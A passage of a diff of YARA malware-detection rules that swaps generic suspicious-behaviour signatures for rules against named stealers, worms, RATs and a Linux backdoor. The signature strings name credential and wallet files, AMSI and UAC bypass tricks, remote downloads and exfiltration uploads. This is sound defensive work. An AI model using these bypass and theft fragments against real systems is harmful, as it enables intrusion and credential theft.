wide - $s4 = "logins.json" nocase ascii wide - $s5 = "account.cfn" nocase ascii wide - $s6 = "wand.dat" nocase ascii wide - $s7 = "wallet.dat" nocase ascii wide - $a1 = "username_value" ascii wide - $a2 = "password_value" ascii wide - $a3 = "encryptedUsername" ascii wide - $a4 = "encryptedPassword" ascii wide - $a5 = "httpRealm" ascii wide + $s1 = "\\DarkCoderSc\\Desktop\\Celesty Binder\\Stub\\STATIC\\Stub.pdb" ascii + $s2 = "DROPIN" fullword ascii wide + $s3 = "EXEC" fullword ascii wide + $s4 = "RBIND" fullword ascii wide + $s5 = "%LAPPDATA%" fullword ascii wide + $s6 = "%USERDIR%" fullword ascii wide condition: - uint16(0)==0x5a4d and ((2 of ($f*) and 2 of ($b*) and 1 of ($s*) and 3 of ($a*)) or (14 of them )) + uint16(0)==0x5a4d and all of them } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_PWSH_Asciiencoding_Pattern : FILE +rule DITEKSHEN_MALWARE_Win_Blitzgrabber : FILE { meta: - description = "Detects PowerShell scripts containing ASCII encoded files" + description = "Detects BlitzGrabber infostealer" author = "ditekSHen" - id = "df96d801-1a14-58af-b245-3a4a6ccf22c6" - date = "2024-06-08" - modified = "2024-06-08" + id = "4240527e-c2f8-5424-986a-c1616fafb9bb" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L710-L724" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "037ce50a6c6d2bf25163e658c5a8c18950715a52fcdf47162fcd288306acbf9c" - score = 40 - quality = 45 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10468-L10487" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "8baceacf3c2af61e00b31e8106820b6f1ce2e7a9d98eaed965e698109ae08314" + score = 75 + quality = 71 tags = "FILE" - importance = 20 strings: - $enc1 = "[char[]]([char]97..[char]122)" ascii - $enc2 = "[char[]]([char]65..[char]90)" ascii - $s1 = ".DownloadData($" ascii - $s2 = "[Net.SecurityProtocolType]::TLS12" ascii - $s3 = "::WriteAllBytes($" ascii - $s4 = "::FromBase64String($" ascii - $s5 = "Get-Random" ascii + $x1 = "**BLITZED GRABBER V" wide + $x2 = "\\BlitzedGrabberV" ascii + $x3 = "Kyanite" ascii wide nocase + $s1 = /;\/\/(SCREENSHOT|PASSWORDS|FORKBOMB|MELTSTUB)\/\// ascii wide + $s2 = "KryptedWare" wide + $s3 = "chckcopyTemp" wide + $s4 = "chckscreenShot" wide + $s5 = "Plugin.Banking." ascii + $s6 = "sChromiumPswPaths" ascii + $s7 = ".CreateDownloadLink(" ascii + $s8 = "CaptureScreen()" ascii + $s9 = ".UploadFile(\"https://api.anonfiles.com/upload\"" ascii condition: - 1 of ($enc*) and 4 of ($s*) and filesize <2500KB + uint16(0)==0x5a4d and (1 of ($x*) and 3 of ($s*)) or (7 of ($s*)) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_JS_Hex_B64Encoded_EXE : FILE +rule DITEKSHEN_MALWARE_Win_Bagle : FILE { meta: - description = "Detects JavaScript files hex and base64 encoded executables" + description = "Detect Bagle / Beagle email worm" author = "ditekSHen" - id = "37516c6b-0a77-5a20-a36f-5f8309b37362" - date = "2024-06-08" - modified = "2024-06-08" + id = "32632bdf-6cf5-5542-8e1f-70686139a465" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L726-L740" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "60185e6ec96875085ffb7a6bf6eb8643368bbce42b89290ab987eb32c1e153bd" - score = 40 - quality = 20 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10489-L10505" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "4c3a09f10c792de1ab25001da29ea2fee84c583d49d9a5225817644aabde2dea" + score = 75 + quality = 75 tags = "FILE" - importance = 20 strings: - $s1 = ".SaveToFile" ascii - $s2 = ".Run" ascii - $s3 = "ActiveXObject" ascii - $s4 = "fromCharCode" ascii - $s5 = "\\x66\\x72\\x6F\\x6D\\x43\\x68\\x61\\x72\\x43\\x6F\\x64\\x65" ascii - $binary = "\\x54\\x56\\x71\\x51\\x41\\x41" ascii - $pattern = /[\s\{\(\[=]_0x[0-9a-z]{3,6}/ ascii + $s1 = "SOFTWARE\\DateTime" fullword ascii + $s2 = "%s?p=%lu" fullword ascii + $s3 = "-upd" ascii + $s4 = "[%RAND%]" fullword ascii + $s5 = "MAIL FROM:<%s>" fullword ascii + $s6 = "RCPT TO:<%s>" fullword ascii + $s7 = "Message-ID: <%s%s>" fullword ascii + $s8 = "Content-Disposition: attachment; filename=\"%s%s\"" fullword ascii + $s9 = "http://www.%s" fullword ascii condition: - $binary and $pattern and 2 of ($s*) and filesize <2500KB + uint16(0)==0x5a4d and 8 of them } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_WMIC_Downloader : FILE +rule DITEKSHEN_MALWARE_Win_Ragestealer : FILE { meta: - description = "Detects files utilizing WMIC for whitelisting bypass and downloading second stage payloads" - author = "ditekSHen" - id = "bdd6deeb-9d43-55ef-9264-652044ba6938" - date = "2024-06-08" - modified = "2024-06-08" + description = "Detect Rage / Priv8 infostealer" + author = "ditekShen" + id = "dfc1abaa-d975-5e6a-ad4d-344031b0c40c" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L765-L776" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0c665f77659b57770f726297b64780764235ba0e72730c985eea62c116fe97e7" - score = 40 - quality = 45 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10507-L10522" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a26b86845bcd62d4a360a8dae9cfa56b5d96ebc521f224c18a01cc0a2bd958e9" + score = 75 + quality = 75 tags = "FILE" - importance = 20 strings: - $s1 = "WMIC.exe os get /format:\"http" wide - $s2 = "WMIC.exe computersystem get /format:\"http" wide - $s3 = "WMIC.exe dcomapp get /format:\"http" wide - $s4 = "WMIC.exe desktop get /format:\"http" wide + $x1 = "\\RageStealer\\obj\\" ascii + $x2 = "Priv8 Stealer" wide + $s1 = "\\Screen.png" wide + $s2 = "Content-Disposition: form-data; name=\"document\"; filename=\"{1}\"" wide + $s3 = "NEW LOG FROM" wide + $s4 = "GRABBED SOFTWARE" wide + $s5 = "DOMAINS DETECTED" wide + $s6 = "snder" ascii condition: - ( uint16(0)==0x004c or uint16(0)==0x5a4d) and 1 of them + uint16(0)==0x5a4d and (1 of ($x*) and 4 of ($s*)) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_AMSI_Bypass : FILE +rule DITEKSHEN_MALWARE_Win_Abubasbanditbot : FILE { meta: - description = "Detects AMSI bypass pattern" + description = "Detects Abubasbandit Bot. Observed to drop cryptocurrency miner detected by MALWARE_Win_CoinMiner02" author = "ditekSHen" - id = "cdb457b3-1f41-5f58-a482-a00d269c1293" - date = "2024-06-08" - modified = "2024-06-08" + id = "8bedd1f7-bd77-5f26-8665-1d23fe56100f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L778-L791" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b398c20a0e7b2dff5fab87575c555b657749d7c3b3e8f1a0f99db7e8f669e3ce" - score = 40 - quality = 45 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10524-L10541" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "aae40178dadff720b42d211a025fd696eabdcc91761c6a91809f5f088c588c31" + score = 75 + quality = 75 tags = "FILE" - importance = 20 strings: - $v1_1 = "[Ref].Assembly.GetType(" ascii nocase - $v1_2 = "System.Management.Automation.AmsiUtils" ascii - $v1_3 = "GetField(" ascii nocase - $v1_4 = "amsiInitFailed" ascii - $v1_5 = "NonPublic,Static" ascii - $v1_6 = "SetValue(" ascii nocase + $x1 = "magickeycmd" ascii + $x2 = "chat_id" ascii + $x3 = "GetTempPathW" ascii + $x4 = "Add-MpPreference" ascii + $x5 = "-Command" ascii + $s1 = "application/x-www-form-urlencoded" ascii + $s2 = "gzip, deflate/index.html" ascii + $s3 = "powershellAdd-MpPreference -ExclusionPath" ascii + $s4 = "tar-xf-C" ascii + $s5 = "temp_file.bin" ascii condition: - 5 of them and filesize <2000KB + uint16(0)==0x5a4d and ( all of ($x*) or (4 of ($x*) and 2 of ($s*)) or (( all of ($s*) and 3 of ($x*))) or (8 of them )) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_PE_Resourcetuner : FILE +rule DITEKSHEN_MALWARE_Win_Oracrat : FILE { meta: - description = "Detects executables with modified PE resources using the unpaid version of Resource Tuner" + description = "Detects OracRAT / Comfoo / Babar" author = "ditekSHen" - id = "2ada52b4-de9e-5b66-a05e-da894ca79e48" - date = "2024-06-08" - modified = "2024-06-08" + id = "53f3778e-56d5-5390-8ce7-82d4ede46be4" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L793-L801" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "25959ba2f974ecdcda624b4b34cd8dac0336af0dd7c88d2e3b17ec94d58b87b8" - score = 40 - quality = 45 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10543-L10557" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "078a5df9f3d0bb8213ea2fe28eefdb453ef186e6c1f62d3ba10cb04fca047700" + score = 75 + quality = 75 tags = "FILE" - importance = 20 strings: - $s1 = "Modified by an unpaid evaluation copy of Resource Tuner 2 (www.heaventools.com)" fullword wide + $s1 = "\\\\.\\DevCtrlKrnl" fullword ascii + $s2 = "SOFTWARE\\Microsoft\\IE4\\Setup" fullword ascii + $s3 = "\\PLUGINS" fullword ascii + $s4 = "\\config\\sam" fullword ascii + $s5 = "\\iexplore.exe\" about:blank" fullword ascii + $s6 = "usbak.sys" fullword ascii + $s7 = "userctfm" fullword ascii condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and 5 of them } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_References_Sectools_B64Encoded : FILE +rule DITEKSHEN_MALWARE_Win_Phemedronestealer : FILE { meta: - description = "Detects executables referencing many base64-encoded IR and analysis tools names" + description = "Detects Phemedrone Stealer infostealer" author = "ditekSHen" - id = "2d3c994a-5b7c-52c5-a4a1-e67a773b692b" - date = "2024-06-08" - modified = "2024-06-08" + id = "297aab1f-351c-5955-8a19-9aa2b7c94748" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L897-L941" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "20f889c9c50e8c5e55fd7ebe508015b1e72e6f7ef1b410e5e707d554fb8e8588" - score = 40 - quality = 43 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10559-L10580" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "74e150cc971f5648f9e3f6146afba162b1a29cf2744c862b2320db52c2efa930" + score = 75 + quality = 75 tags = "FILE" - importance = 20 strings: - $s1 = "VGFza21ncg==" ascii wide - $s2 = "dGFza21ncg==" ascii wide - $s3 = "UHJvY2Vzc0hhY2tlcg" ascii wide - $s4 = "cHJvY2V4cA" ascii wide - $s5 = "cHJvY2V4cDY0" ascii wide - $s6 = "aHR0cCBhbmFseXplci" ascii wide - $s7 = "ZmlkZGxlcg" ascii wide - $s8 = "ZWZmZXRlY2ggaHR0cCBzbmlmZmVy" ascii wide - $s9 = "ZmlyZXNoZWVw" ascii wide - $s10 = "SUVXYXRjaCBQcm9mZXNzaW9uYWw" ascii wide - $s11 = "ZHVtcGNhcA" ascii wide - $s12 = "d2lyZXNoYXJr" ascii wide - $s13 = "c3lzaW50ZXJuYWxzIHRjcHZpZXc" ascii wide - $s14 = "TmV0d29ya01pbmVy" ascii wide - $s15 = "TmV0d29ya1RyYWZmaWNWaWV3" ascii wide - $s16 = "SFRUUE5ldHdvcmtTbmlmZmVy" ascii wide - $s17 = "dGNwZHVtcA" ascii wide - $s18 = "aW50ZXJjZXB0ZXI" ascii wide - $s19 = "SW50ZXJjZXB0ZXItTkc" ascii wide - $s20 = "b2xseWRiZw" ascii wide - $s21 = "eDY0ZGJn" ascii wide - $s22 = "eDMyZGJn" ascii wide - $s23 = "ZG5zcHk" ascii wide - $s24 = "ZGU0ZG90" ascii wide - $s25 = "aWxzcHk" ascii wide - $s26 = "ZG90cGVla" ascii wide - $s27 = "aWRhNjQ" ascii wide - $s28 = "UkRHIFBhY2tlciBEZXRlY3Rvcg" ascii wide - $s29 = "Q0ZGIEV4cGxvcmVy" ascii wide - $s30 = "UEVpRA" ascii wide - $s31 = "cHJvdGVjdGlvbl9pZA" ascii wide - $s32 = "TG9yZFBF" ascii wide - $s33 = "cGUtc2lldmU=" ascii wide - $s34 = "TWVnYUR1bXBlcg" ascii wide - $s35 = "VW5Db25mdXNlckV4" ascii wide - $s36 = "VW5pdmVyc2FsX0ZpeGVy" ascii wide - $s37 = "Tm9GdXNlckV4" ascii wide + $p1 = /\{ file = \{(0|file)\}, data = \{(1|data)\} \}/ ascii wide + $p2 = "{ <>h__TransparentIdentifier0 = {0}, match = {1} }" wide + $p3 = "{ <>h__TransparentIdentifier1 = {0}, encrypted = {1} }" wide + $p4 = "{<>h__TransparentIdentifier0}, match = {match} }" ascii + $p5 = "{<>h__TransparentIdentifier1}, encrypted = {encrypted} }" ascii + $s1 = "b__" ascii + $s2 = "b__" ascii + $s3 = "b__" ascii + $s4 = "b__" ascii + $s5 = "b__" ascii + $s6 = "masterPass" ascii + $s7 = "rootLocation" ascii + $s8 = "rgsServiceNames" ascii + $s9 = "rgsFilenames" ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and (( all of ($p*) and 3 of ($s*)) or (3 of ($p*) and 4 of ($s*)) or (7 of ($s*))) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_References_Sandbox_Artifacts : FILE +rule DITEKSHEN_MALWARE_Win_WSHRAT : FILE { meta: - description = "Detects executables referencing sandbox artifacts" + description = "Detects WASHRAT" author = "ditekSHen" - id = "2c0e4d38-8d68-5cd2-9f9e-e56f372b67cf" - date = "2024-06-08" - modified = "2024-06-08" + id = "e7940b7f-51dd-5a32-899b-64310f27bf3e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L943-L976" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "3d4a356191ec914eba86e78d3823dd1dc2d18f17074abb9986f3337169821bc6" - score = 40 - quality = 43 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10582-L10600" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "297bfe65815637a464e2a8fc23570c6e79694ffe0467d5898b7c845f1450de95" + score = 75 + quality = 73 tags = "FILE" - importance = 20 strings: - $s1 = "C:\\agent\\agent.pyw" ascii wide - $s2 = "C:\\sandbox\\starter.exe" ascii wide - $s3 = "c:\\ipf\\BDCore_U.dll" ascii wide - $s4 = "C:\\cwsandbox_manager" ascii wide - $s5 = "C:\\cwsandbox" ascii wide - $s6 = "C:\\Stuff\\odbg110" ascii wide - $s7 = "C:\\gfisandbox" ascii wide - $s8 = "C:\\Virus Analysis" ascii wide - $s9 = "C:\\iDEFENSE\\SysAnalyzer" ascii wide - $s10 = "c:\\gnu\\bin" ascii wide - $s11 = "C:\\SandCastle\\tools" ascii wide - $s12 = "C:\\cuckoo\\dll" ascii wide - $s13 = "C:\\MDS\\WinDump.exe" ascii wide - $s14 = "C:\\tsl\\Raptorclient.exe" ascii wide - $s15 = "C:\\guest_tools\\start.bat" ascii wide - $s16 = "C:\\tools\\aswsnx\\snxcmd.exe" ascii wide - $s17 = "C:\\Winap\\ckmon.pyw" ascii wide - $s18 = "c:\\tools\\decodezeus" ascii wide - $s19 = "c:\\tools\\aswsnx" ascii wide - $s20 = "C:\\sandbox\\starter.exe" ascii wide - $s21 = "C:\\Kit\\procexp.exe" ascii wide - $s22 = "c:\\tracer\\mdare32_0.sys" ascii wide - $s23 = "C:\\tool\\malmon" ascii wide - $s24 = "C:\\Samples\\102114\\Completed" ascii wide - $s25 = "c:\\vmremote\\VmRemoteGuest.exe" ascii wide - $s26 = "d:\\sandbox_svc.exe" ascii wide + $x1 = "WSH Rat v" wide + $x2 = "SOFTWARE\\WSHRat" wide + $x3 = "WSH Remote" wide nocase + $x4 = "WSHRAT" wide nocase + $s1 = "shellobj.regwrite \"HKEY_" ascii nocase + $s2 = "shellobj.run(\"%comspec% /c" ascii nocase + $s3 = "objhttpdownload.setrequestheader \"user-agent:\"," ascii nocase + $s4 = "WScript.CreateObject(\"Shell.Application\").ShellExecute" ascii nocase + $s5 = "objwmiservice.ExecQuery(\"select" ascii nocase + $s6 = "httpobj.open(\"post\",\"http" ascii nocase + $s7 = /(rdp|keylogger|get-pass|uvnc)\|http/ wide condition: - uint16(0)==0x5a4d and 3 of them + uint16(0)==0x5a4d and (2 of ($x*) or (1 of ($x*) and 1 of ($s*)) or (6 of ($s*))) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Embedded_Gzip_B64Encoded_File : FILE +rule DITEKSHEN_MALWARE_Win_Rustystealer : FILE { meta: - description = "Detects executables containing bas64 encoded gzip files" + description = "Detect Rusty / Luca stealer" author = "ditekSHen" - id = "e50f8560-d53b-5388-b94d-d104b7c064f2" - date = "2024-06-08" - modified = "2024-06-08" + id = "af39f88c-e0df-51f6-bb11-f3a7231180d0" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L978-L987" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "431e5a45bf8ed5874b330419675b3d43eb6a563c42873730e823cdd7d6efba97" - score = 40 - quality = 45 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10602-L10625" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e60e66360c8f97a31e75cd90a12519f75f3a672874fc985a8da1d4d02e185b4d" + score = 75 + quality = 75 tags = "FILE" - importance = 20 strings: - $s1 = "H4sIAAAAAAA" ascii wide - $s2 = "AAAAAAAIs4H" ascii wide + $s1 = "EdgeMicrosoftedgechromiumChromium7star7StaramigoAmigobraveBrave" ascii + $s2 = "BrowserchromeChromekometaKometaorbitumOrbitumsputnikSputniktorchTorchucozmediaUranuCozMediavivaldiVivaldiatom" ascii + $s3 = ".kdbx.pdf.doc.docx.xls.xlsx.ppt.pptx.odt.odp\\logscx\\sensfiles.zip" ascii + $s4 = "dumper.rs" ascii + $s5 = "decryption_core.rs" ascii + $s6 = "anti_emulation.rs" ascii + $s7 = "discord.rs" ascii + $s8 = /\\logscx\\(passwords_|cookies_|creditcards_)/ ascii + $s9 = "VirtualBoxVBoxVMWareVMCountry" ascii + $s10 = "New Log From ( / )" ascii + $s11 = "BrowserChromeKometaOrbitumSputnikTorchUranuCozMediaVivaldiAtomMail" ascii + $s12 = "BrowserBraveSoftwareCentBrowserChedotChrome" ascii + $s13 = "ChromeKometaOrbitumSputnikTorchUranuCozMediaVivaldi" ascii + $s14 = "hostnameencryptedUsernameencryptedPasswordstruct" ascii + $s15 = "encryptedPassword" fullword ascii + $s16 = "AutoFill@~" fullword ascii condition: - uint16(0)==0x5a4d and 1 of them + uint16(0)==0x5a4d and 6 of them } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_PWSH_Passwordcredential_Retrievepassword +rule DITEKSHEN_MALWARE_Win_Simplepacker : FILE { meta: - description = "Detects PowerShell content designed to retrieve passwords from host" + description = "Detects Hydrochasma packer / dropper" author = "ditekSHen" - id = "b34599ab-b874-5ea5-990d-bc7593bb08b5" - date = "2024-06-08" - modified = "2024-06-08" + id = "449f7531-408f-5bda-aa64-d148c363c3e5" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L1048-L1058" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f09320d9c4734579a535c7fee993fa076974b13ffd25e0d9ab02bc09663595f8" - score = 40 - quality = 39 - tags = "" - importance = 20 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10627-L10638" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e2c07947fdf53814669250052f6cceb7412aa302422f3a0b430879da638c7e6a" + score = 75 + quality = 75 + tags = "FILE" strings: - $namespace = "Windows.Security.Credentials.PasswordVault" ascii wide nocase - $method1 = "RetrieveAll()" ascii wide nocase - $method2 = ".RetrievePassword()" ascii wide nocase + $p1 = "\\cloud-compiler-" ascii + $p2 = "\\deps\\simplepacker.pdb" ascii + $s1 = "uespemosarenegylmodnarodsetybdetqueue" ascii + $s2 = "None{\"" ascii condition: - $namespace and 1 of ($method*) + uint16(0)==0x5a4d and ( all of ($p*) or (1 of ($p*) and all of ($s*))) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_Envvarscheduledtasks +rule DITEKSHEN_MALWARE_Multi_Golangbypassav : FILE { meta: - description = "detects Windows exceutables potentially bypassing UAC (ab)using Environment Variables in Scheduled Tasks" + description = "Detect Go executables using GolangBypassAV" author = "ditekSHen" - id = "14244310-e524-54bf-8822-9b953378bb75" - date = "2024-06-08" - modified = "2024-06-08" + id = "bd41ff7e-ce57-5bee-b6ca-9341b4c1c1fa" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L1070-L1081" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "dacca794aefd66526535a87c8890c0ad65550ff88bc0242f05c84c9452a31fe2" - score = 40 - quality = 45 - tags = "" - importance = 20 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10679-L10689" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "842dfc7c04cbd19bbbc8b6fbf9d9925f81a21dfb713af4542ca4157d64fa5b51" + score = 75 + quality = 75 + tags = "FILE" + clamav1 = "MALWARE.Win.Trojan.GolangBypassAV" + clamav2 = "MALWARE.Linux.Trojan.GolangBypassAV" strings: - $s1 = "\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup" ascii wide - $s2 = "\\Environment" ascii wide - $s3 = "schtasks" ascii wide - $s4 = "/v windir" ascii wide + $s1 = "/GolangBypassAV/gen/" ascii condition: - all of them + ( uint16(0)==0x5a4d or uint16(0)==0x457f) and 1 of them } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_Fodhelper +rule DITEKSHEN_MALWARE_Win_Blankstealer : FILE { meta: - description = "detects Windows exceutables potentially bypassing UAC using fodhelper.exe" + description = "Detects BlankStealer / BlankGrabber / Blank-c Stealer" author = "ditekSHen" - id = "0651e428-a2ef-508d-ad89-c68ac758808f" - date = "2024-06-08" - modified = "2024-06-08" + id = "19686781-4be8-56c1-b606-d8fe14dbdc48" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L1083-L1094" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ec41ca2185732e418825f7c32095dea361a53e586e498baf4c17eaaf9602ba5e" - score = 40 - quality = 43 - tags = "" - importance = 20 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10691-L10703" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "cc0c8d3e0061d192e445ef661387360644ab428a9e9fc2480e966db96bc8264c" + score = 75 + quality = 75 + tags = "FILE" + snort = "923829001" strings: - $s1 = "\\software\\classes\\ms-settings\\shell\\open\\command" ascii wide nocase - $s2 = "DelegateExecute" ascii wide - $s3 = "fodhelper" ascii wide - $s4 = "ConsentPromptBehaviorAdmin" ascii wide + $s1 = "Blank-c" ascii + $s2 = "Stealer License" ascii + $s3 = "UID=" ascii + $h1 = { 42 6c 61 6e 6b 2d 63 0a 53 74 65 61 6c 65 72 20 4c 69 63 65 6e 73 65 0a 55 49 44 3d } condition: - all of them + ( uint16(0)==0x4152 and 2 of them ) or ( all of ($s*) or 1 of ($h*)) } -import "time" import "pe" -rule DITEKSHEN_INDICATOR_SUSPICIOUS_Finger_Download_Pattern +rule DITEKSHEN_MALWARE_Linux_Getshell : FILE { meta: - description = "Detects files embedding and abusing the finger command for download" + description = "Detect GetShell Linux backdoor" author = "ditekSHen" - id = "6647b410-c8f0-596b-95d7-dbc6a951a83f" - date = "2024-06-08" - modified = "2024-06-08" + id = "cccad93d-cd49-5237-96ac-66c9ac6ef532" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/indicator_suspicious.yar#L1108-L1118" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "04cbb1abc4c3d2990bae798ece052eb8aa1b5104b5712e98aeb80731316b9c57" - score = 40 - quality = 45 - tags = "" - importance = 20 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L10705-L10725" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "9d44ad2a3c270eed0e905402e8c32dcca54da90f4229d9d59874ee09b3b47277" + score = 75 + quality = 75 + tags = "FILE" + clamav1 = "MALWARE.Linux.Trojan.GetShell" strings: - $pat1 = /finger(\.exe)?\s.{1,50}@.{7,10}\|/ ascii wide - $pat2 = "-Command \"finger" ascii wide - $ne1 = "Nmap service detection probe list" ascii + $x1 = "cat <(echo '@reboot echo socks5_backconnect" ascii + $x2 = "(cd && )') <(sed '/socks5_backconnect" ascii + $s1 = "cat <(echo '@" ascii + $s2 = "(cd && )') <(sed '" ascii + $s3 = "PORT1:" ascii + $s4 = "HOST1:" ascii + $s5 = "queryheader" ascii + $s6 = "qsectionpost" ascii + $s7 = "packedip" ascii + $s8 = "copydata" 